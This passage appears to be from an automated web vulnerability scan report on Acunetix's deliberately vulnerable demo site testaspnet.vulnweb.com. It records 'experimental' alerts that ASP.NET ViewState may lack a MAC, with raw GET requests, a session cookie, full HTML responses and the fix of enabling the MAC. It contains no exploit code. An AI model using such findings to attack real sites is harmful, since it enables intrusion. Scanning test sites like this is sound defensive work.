          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        8. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's ViewState, but possibly without a MAC.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        9. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's ViewState, but possibly without a MAC.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a 